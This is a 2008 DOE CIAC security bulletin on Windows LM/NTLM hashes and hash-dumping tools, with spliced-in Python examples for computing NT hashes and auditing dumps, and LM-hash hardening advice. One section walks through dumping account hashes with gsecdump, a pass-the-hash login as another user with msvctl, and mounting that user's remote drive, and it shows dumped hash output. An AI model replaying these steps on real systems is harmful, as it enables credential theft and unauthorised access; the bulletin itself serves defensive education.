-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

__________________________________________________________
The U.S. Department of Energy
Computer Incident Advisory Capability
__________________________________________________________

                           TECHNICAL BULLETIN

            Understanding Windows Hash Dumpers and Crackers

May 21, 2008 23:00 GMT                                  Number CIACTech08-002
______________________________________________________________________________

PROBLEM:   Windows Hash Dumper programs are both auditing and hacking tools. For auditing, they are used to detect poor passwords. As a hacking tool, they are used for the same purpose: finding poor passwords that can be broken and then used to compromise systems, or hashes that can be used directly to log in to systems.

PLATFORM:  All Windows Platforms

ABSTRACT:  Windows hash dumping tools are often spotlighted as hacker tools that can somehow magically extract Windows hashes and allow an intruder access to a system. In actuality, the hashes are there, in memory and on disk, where any admin or system level user can get at them. The tools just grab and print them out. This paper describes how Windows hashes are created, how the hash dumpers get at them, and what can be done with the hashes.
______________________________________________________________________________

LINKS:
  CIAC BULLETIN: http://www.ciac.org/ciac/techbull/CIACTech08-002.shtml

  OTHER LINKS:
    TrueSec: gsecdump:
      http://www.truesec.com/PublicStore/catalog/Downloads,223.aspx
    pwdump: http://en.wikipedia.org/wiki/Pwdump
    Fgdump: http://foofus.net/fizzgig/fgdump/
    TrueSec: msvctl:
      http://www.truesec.com/PublicStore/catalog/Downloads,223.aspx
    Sysinternals: psexec:
      http://technet.microsoft.com/en-us/sysinternals/bb795534.aspx
    Microsoft: Selecting Good Passwords:
      http://www.microsoft.com/technet/security/smallbusiness/prodtech/WindowsXP/select_sec_passwords.mspx
    John the Ripper: http://www.openwall.com/john/
    Rainbow Tables: http://en.wikipedia.org/wiki/Rainbow_table
    Disable LM Hash: http://support.microsoft.com/kb/299656
______________________________________________________________________________

Windows hash dumping tools are often spotlighted as hacker tools that can somehow magically extract Windows hashes and allow an intruder access to a system. In actuality, the hashes are there, in memory or on disk, where any admin or system level user can get at them. The tools just grab them and print them out.

Windows Hashes
==============

To understand Windows hash dumping tools, you first have to understand Windows hashes. When you create a password for an account, the password is not stored in the system in clear text. It was very apparent early on that storing passwords on a system in clear text was not a good idea: anyone who got access to the password file would have access to every account on the system. The trouble is, if you don't have the password on a system you cannot use it to authenticate a user's login. To get around this problem, system developers hashed the password with a one way hash and stored the hash on the system. When a person logs in, the password he types is hashed and the result compared to the stored hash. If they match, the user is allowed in.
A one way hash is a function that converts an input text string to a unique output text string. It is one way because, given the output string, there is no function that gives you back the input string. The only way to find the input string is to try all possible input strings until the output string matches the one you are searching for. For this reason, if an intruder were to steal the hash database, it could not be immediately used to break into a system because the passwords would have to be cracked first. Cracking involves trying every possible input string to find the one that generates the wanted output string. If the password is sufficiently long and complex, it can take an intruder a huge amount of time (millions of years for a sufficiently good password) to do the cracking.

That is not to say that cracking programs have not found ways to shorten that process. The most common is to use a dictionary. Most human generated passwords use dictionary words, so hashing a dictionary as a first attempt to crack a password often gets results faster than trying a random list of characters.

Newer cracking programs use what are called Rainbow Tables. In its simplest form, a Rainbow Table is a dictionary of hashes. You generate and store the table beforehand and then just look up the hash in the table to find the password. It is actually a bit more complicated than that, as you cannot store all possible hashes, but that is basically how it works. This method of attack became practical with the advent of large, inexpensive hard drives to hold the huge tables.

One method for making Rainbow Tables difficult or impossible to use is to salt the hash. Salting involves adding some random characters (the salt) to the password before hashing it. Using a different salt with a password creates a different hash. You then save the salt with the hash so it can be used when the password is checked.
There are now millions of variations for every password, one for every possible value of the salt, making it impossible to store sufficiently large Rainbow Tables to make the method work. While salt has been used in Unix password hashes for many years, salt is not used in Windows hashes.

Windows Hashes
==============

Windows systems currently use one or more of four different authentication methods.

  LanManager (LM)
  NT Lan Manager (NTLM)
  NT Lan Manager 2 (NTLMv2)
  Kerberos

Each of these methods uses different hashes of the password and different storage methods.

LanManager (LM) hashes are the oldest and least secure of the Windows hashes. A password is first shifted to all upper case and then broken into two 7 character chunks. Each chunk is then hashed independently without salt and the two results are concatenated. The result is that an intruder need only crack two seven character hashes and need only consider upper case characters, numbers, and symbols to break the password. This is very easy to do using today's technology. Another difficulty with LM as the security authenticator is that the hash is sent over the network in the clear when doing a network login to a system. This mechanism makes it possible to capture the hash by sniffing the network.

The NT LanManager (NTLMv1) hash is created by taking the MD4 hash of the user's password. This is a much stronger hash because the password is not changed to upper case, the Unicode character set can be used, and the password is not broken into shorter, easier to crack chunks. To further increase security, logins with NTLMv1 use a challenge response mechanism so that the hash is never sent over the network.

NT LanManager version 2 (NTLMv2) uses the NTLMv1 hash but with a much more secure challenge response mechanism to authenticate someone over the network.

Kerberos is used by Microsoft Windows Active Directory based security.
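The following is an added example written for this bulletin; it is not code from CIAC or from any of the tools described here. It builds the NT hash exactly as described above (MD4 over the UTF-16LE encoding of the password, with no salt), using a pure-Python MD4 taken from RFC 1320 because many OpenSSL builds ship with MD4 disabled in hashlib. It then contrasts that with an illustrative salted scheme (SHA-256 over salt plus password, an assumption for illustration only; Windows does nothing like it) to show why identical Windows passwords always produce identical hashes while salted ones do not.

```python
"""NT hash construction and why the lack of salt matters (added example)."""
import hashlib
import os
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _f(x, y, z):
    return (x & y) | (~x & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


# Each MD4 round: boolean function, message-word order, rotation amounts, additive constant.
_ROUNDS = (
    (_f, list(range(16)), (3, 7, 11, 19), 0x00000000),
    (_g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
    (_h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
)


def md4(data: bytes) -> bytes:
    """MD4 digest (RFC 1320) of an arbitrary byte string."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    # Padding: 0x80, zeros up to 56 mod 64, then the 64-bit little-endian bit length.
    data = data + b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, order, shifts, konst in _ROUNDS:
            for step, k in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[k] + konst) & MASK32, shifts[step % 4])
                a, b, c, d = d, a, b, c  # rotate roles so the next step updates the next register
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NTLM (NT) hash: MD4 over UTF-16LE of the password. No salt, no case folding,
    no splitting into chunks, so equal passwords always give equal hashes."""
    return md4(password.encode("utf-16-le")).hex()


def salted_hash(password: str, salt: bytes = None):
    """Illustrative salted scheme (assumption, not a Windows mechanism): returns
    (salt, hex digest). The salt is stored beside the digest for later checks."""
    if salt is None:
        salt = os.urandom(16)
    return salt, hashlib.sha256(salt + password.encode("utf-8")).hexdigest()


def verify_salted(password: str, salt: bytes, stored_hex: str) -> bool:
    """Recompute the salted digest with the stored salt and compare."""
    return hashlib.sha256(salt + password.encode("utf-8")).hexdigest() == stored_hex


if __name__ == "__main__":
    # The empty-password NT hash is the value the bulletin's gsecdump output shows for Guest.
    print("NT hash of empty password:", nt_hash(""))
    print("Same password, same NT hash:", nt_hash("Secret1") == nt_hash("Secret1"))
    _, h1 = salted_hash("Secret1")
    _, h2 = salted_hash("Secret1")
    print("Same password, different salts, different digests:", h1 != h2)
```

Because the NT hash has no salt, one precomputed table of NT hashes serves for every account on every Windows system, which is exactly the property that makes Rainbow Tables practical against it.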
To be backward compatible with older Windows systems, most new systems come with all of these authentication mechanisms enabled. LM is enabled to allow connections with Windows for Workgroups, Windows 95, and Windows 98. If you are not sharing a network with these systems, you do not need it and it should be disabled. NTLMv1 is needed to share a network with Windows NT4 SP3 or earlier. Again, if you are not sharing a network with this version of Windows, you do not need NTLMv1. NTLMv2 is needed for connecting to Windows 2000 domains and Windows NT4 SP4 or later. Windows Local and Group Policy keys are available to control which of the LanMan versions a system will accept.

Hash Dumpers
============

Probably the most well known of the hash dumpers is pwdump. There are currently seven versions of pwdump written by various people, but all do essentially the same thing. They extract the LM and NTLM hashes from the SAM database. The SAM is the part of the registry that holds security information. They also try to dump the hashes cached from previous domain logins into the system and the hashes of the currently logged in users. To improve security, the SAM can be encrypted, but most of the hash dumpers know how to decrypt it, as the ability to decrypt it must be available for the system to use it.

One thing to keep in mind is that you must be a privileged user to run the hash dumpers and extract any hashes. They do not magically get around the security system. That said, if you are logged into a workstation and have administrator access to that workstation and the domain administrator is also logged into that workstation, you can get the domain administrator's hash using one of these hash dumpers.

Pwdump
======

Pwdump is one of the oldest hash dumpers. It can dump the hashes in the local registry to a file that can be used with Windows cracking programs such as John the Ripper. Version 3 added the capability to dump hashes on remote systems.
You must have admin access to the remote system to do this. It operates by pushing code onto the remote system using the ADMIN$ share. It then requests the Service Control Manager to install and run that code as a service. To extract the hashes, you must have privileged access to the SAM. As the Windows LSASS process runs with sufficient privileges, pwdump uses a technique called DLL injection to inject its code into the LSASS process space and get it run. The code then extracts the password hashes and stores them in the registry. The attacking system can then connect to the registry remotely and download the hashes.

Fgdump
======

Fgdump is the combination of several different hash dumping tools into one executable to make it easier to dump the hashes. It includes pwdump6, cachedump, and pstgdump. The following operational steps are from the fgdump readme.

  Bind to a remote machine using IPC$ (or a list of machines)
  Stop AV, if it is installed
  Locate file shares exposed on that machine
  Find a writable share from the above list, bind it to a local drive
  Upload fgexec (used for remote command execution) for cachedump
  Run pwdump
  Run cachedump
  Run pstgdump
  Unbind the remote file share
  Restart AV if it was running
  Unbind from IPC$

Pwdump6 dumps the hashes in the SAM registry file as described above. Cachedump dumps the cached domain credentials. When you do a domain login to a Windows system, the system caches your credentials for situations where the domain controller is not available. This allows you to log in to a system when the domain controller is down; otherwise you could only log in using local credentials. Pstgdump dumps the protected storage, which includes things like saved IE and Outlook Express passwords.

Gsecdump
========

The newest kid on the block is gsecdump. Gsecdump is very similar in its capabilities to Fgdump but without the remote system capabilities. To run it on a remote system you must use the Sysinternals (now Microsoft) psexec program.
Gsecdump dumps the SAM and the cache of domain credentials. In addition, it can dump the LSA secrets, wireless secrets, and active logon sessions.

msvctl
======

Another new program related to the hash dumpers is msvctl. This program is essentially a login program that uses the hash instead of the password to log in to a system. As all authentication is actually done with the hashes, this program dispenses with the password and directly uses the hashes to perform the logins.

Disabling the LM Hash
=====================

To disable the LM hash, you must make two changes using the registry or policy editors. The first disables the use of the LM hash in network logins. The second prevents the LM hash from being saved on disk in the SAM. These instructions are for Windows XP, with the variations needed for Windows 2000 in parentheses.

Preventing the Use of the LM Hash in Network Logins
---------------------------------------------------

In the Control Panel, open Administrative Tools, then the Local Security Policy tool. Under Local Policies, select Security Options. In the Security Options list, double click "Network security: LAN Manager authentication level" ("LAN Manager Authentication Level" in Windows 2000). At this point, you will have a drop down list of local policy settings for what kinds of authentication to do for network logins. If possible, set this to "Send NTLMv2 response only/refuse LM & NTLM", which is the highest setting. If you must use a lower level setting, try to pick one that does not allow LM hashes.

Preventing the Storing of LM Hashes
-----------------------------------

The next step is to prevent the storing of LM hashes. Again, open the Local Security Policy tool and select Security Options. In the Security Options list, double click "Network security: Do not store LAN Manager hash value on next password change". In the dialog box that appears, select Enabled and click OK. You will then need to change all the passwords on the system.
The new passwords will be stored in the SAM with the hash of a blank password in place of the LM hash and the real hash for the NTLM hash. This security option is not available in Windows 2000, so you will need to edit the registry directly. In Windows 2000, open regedit and edit the following registry key:

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

Add the key NoLMHash under this key and reboot your system. More information can be found in the following article.

  http://support.microsoft.com/kb/299656

Hash Dumpers in Use
===================

To get a feel for how hash dumpers are used, this section will go through all the steps necessary to dump the hashes and crack them. First run gsecdump -h to see the options.

  gsecdump [options]
  options:
    -h [ --help ]            show help
    -a [ --dump_all ]        dump all secrets
    -l [ --dump_lsa ]        dump lsa secrets
    -w [ --dump_wireless ]   dump mircosoft wireless connections
    -u [ --dump_usedhashes ] dump hashes from active logon sessions
    -s [ --dump_hashes ]     dump hashes from SAM/AD

Using -a, it will dump whatever it can find on a system.
  F:\Projects\gsecdump>gsecdump -a
  info: you must run as LocalSystem to dump LSA secrets
  Microsoft wireless secrets:
  No interfaces found
  CIAC\orvis::aa7060d41533f2daa361a6c342c88aea:6faccd47f6ba2685521aacb32fd788f2:::
  CIAC\jonathon::a46139feaaf2b9f1af13362357cec994:621e7e6212259c99338ea3733ef47abd:::
  CIAC\BEATRICE$::00000000000000000000000000000000:e733a66ffb1bf591c011a1cbf84392ad:::
  CIAC\BEATRICE$::00000000000000000000000000000000:e733a66ffb1bf591c011a1cbf84392ad:::
  ASPNET(current):1003:aad3b435b51404eeaad3b435b51404ee:72f96de62387d4f07d0fc70067a1b711:::
  administrator:1004:aad3b435b51404eeaad3b435b51404ee:a18d154b7ac68fab46c077f64d2c6124:::
  Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant(current):1000:8e8fa1208e3659556970e6173d54580:e9302c669523de51c557a4c61c6b38d9:::
  SQLDebugger(current):1013:aad33235451404eeaad3b435b51404ee:c1f211f6d76d9755468b5e7ef806fcc1:::
  SUPPORT_388945a0(current):1002:aad3b435b51404eeaad3b435b51404ee:5a69566824cd4d2bbec5441b00930be9:::
  VUSR_VAP2(current):1006:aad3b435b51404eeaad3b435b51404ee:5bd277e41258752719a45a082a83c952:::

First, you see the hash of the logged in domain user ciac\orvis (me). Following that is the machine account logged into the domain, ciac\beatrice, and then the local accounts from the SAM. This system has LM hashes turned on, so you see both the LM hash (between the second and third colon) and the NTLM hash (between the third and fourth colon). On some of the accounts the LM hash is disabled and is replaced with aad3b435b51404eeaad3b435b51404ee, which is the LM hash of a blank password. From this hash, you can see that the LM hash is actually two hashes concatenated together. For some accounts, you may also see all zeroes or NO PASSWORD********************* for the disabled LM hash.

I see that Jonathon is logged into my system, so I have his hash. I happen to know that his system is demonpc, so I can use the msvctl program to log in as him.
First, run the msvctl command as jonathon and have it start a command shell.

  F:\>msvctl jonathon:1003:c222dae1d1379a51c22df6105198:7a306030abd444f34c2ab0181fde1033::: run cmd

This opens a command shell on my system using Jonathon's hash. If Jonathon has administrative privileges on a remote system, I can use the net commands to mount his drives or the psexec command to run gsecdump on the remote system to gather even more password hashes. First, try the net use command to see if I really have access to his system.

  F:>net use r: \\demonpc\c$
  The command completed successfully.

  F:\>r:

  R:\>dir
   Volume in drive R has no label.
   Volume Serial Number is 04B4-5B64

   Directory of R:\

  09/21/2007  09:19 AM
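The dump output above is in the pwdump format (user:rid:lmhash:nthash:::) that pwdump, fgdump and gsecdump all emit. What follows is an added auditing example written for this bulletin, not code from CIAC or from any of those tools: it parses such lines and reports, per account, whether an LM hash is still being stored (so the disable-LM settings from the previous section have not taken effect), whether the stored LM hash shows the password is seven characters or fewer (the second LM half equals the blank-chunk value aad3b435b51404ee), and whether the NT hash is that of an empty password. The sample dump is constructed for this example; only the blank-hash constants and the disabled-LM forms come from the bulletin.

```python
"""Audit pwdump-format hash lines for LM hash exposure (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# The LM hash of a blank password is the blank 7-character chunk value twice.
LM_BLANK_HALF = "aad3b435b51404ee"
LM_BLANK = LM_BLANK_HALF * 2
# NT hash of the empty password (MD4 of the empty UTF-16LE string).
NT_BLANK = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample: two lines borrowed from the bulletin's output, the rest invented.
SAMPLE_DUMP = r"""
info: you must run as LocalSystem to dump LSA secrets
administrator:1004:aad3b435b51404eeaad3b435b51404ee:a18d154b7ac68fab46c077f64d2c6124:::
Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyuser:1020:0123456789abcdefaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
CIAC\orvis::aa7060d41533f2daa361a6c342c88aea:6faccd47f6ba2685521aacb32fd788f2:::
oldbox$::00000000000000000000000000000000:e733a66ffb1bf591c011a1cbf84392ad:::
"""


@dataclass
class HashRecord:
    user: str
    rid: Optional[int]      # None for domain/session entries, which carry no RID
    lm: str
    nt: str
    findings: List[str]


def parse_line(line: str) -> Optional[HashRecord]:
    """Parse one dump line; return None for status lines that are not credentials."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        return None
    user, rid_text, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not HEX32.match(nt):
        return None                      # no NT hash field: not a credential line
    rid = int(rid_text) if rid_text.isdigit() else None
    findings = []
    if lm in (LM_BLANK, "0" * 32) or lm.startswith("no password"):
        findings.append("lm_disabled")   # the forms the bulletin lists for a disabled LM hash
    elif HEX32.match(lm):
        findings.append("lm_present")    # a real LM hash is stored: upper-cased, two 7-char chunks
        if lm[16:] == LM_BLANK_HALF:
            findings.append("password_7_chars_or_fewer")  # second chunk is empty
    else:
        findings.append("lm_unparsed")
    if nt == NT_BLANK:
        findings.append("nt_blank_password")
    return HashRecord(user, rid, lm, nt, findings)


def audit(dump_text: str) -> List[HashRecord]:
    """Parse a whole dump, skipping lines that are not hash records."""
    records = (parse_line(line) for line in dump_text.splitlines())
    return [r for r in records if r is not None]


def summarize(records: List[HashRecord]) -> Dict[str, int]:
    """Count how many accounts carry each finding."""
    counts: Dict[str, int] = {}
    for r in records:
        for f in r.findings:
            counts[f] = counts.get(f, 0) + 1
    return counts


if __name__ == "__main__":
    recs = audit(SAMPLE_DUMP)
    for r in recs:
        print(f"{r.user:<20} rid={r.rid!s:<6} {', '.join(r.findings)}")
    print("summary:", summarize(recs))
```

Run against a real dump taken on a system you administer, a non-zero lm_present count after the "Do not store LAN Manager hash value" policy was enabled means those accounts have not yet changed their password, since the LM hash is only dropped on the next password change.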